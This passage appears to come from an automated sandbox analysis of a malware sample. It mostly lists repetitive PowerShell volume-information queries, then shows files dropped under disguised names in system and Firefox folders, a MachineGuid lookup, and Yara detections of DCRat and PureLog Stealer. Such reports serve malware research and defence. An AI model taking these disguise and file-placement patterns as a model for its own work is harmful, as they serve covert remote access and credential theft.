Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Queries volume information: C:\Users\user\Desktop\0J5DzstGPi.exe VolumeInformation
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Queries volume information: C:\Users\user\Desktop\0J5DzstGPi.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\sihost.exe	Queries volume information: C:\Recovery\sihost.exe VolumeInformation
Source: C:\Recovery\sihost.exe	Queries volume information: C:\Recovery\sihost.exe VolumeInformation
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Queries volume information: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe VolumeInformation
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Queries volume information: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe VolumeInformation
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Queries volume information: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe VolumeInformation
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Queries volume information: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe VolumeInformation
Source: C:\Recovery\sihost.exe	Queries volume information: C:\Recovery\sihost.exe VolumeInformation
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Queries volume information: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe VolumeInformation
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Queries volume information: C:\Users\user\Desktop\0J5DzstGPi.exe VolumeInformation

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1845656712.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0J5DzstGPi.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: steBCuuQsIefcKufvgYbRBCxKhPR.exe PID: 4040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: steBCuuQsIefcKufvgYbRBCxKhPR.exe PID: 5496, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0J5DzstGPi.exe, type: SAMPLE
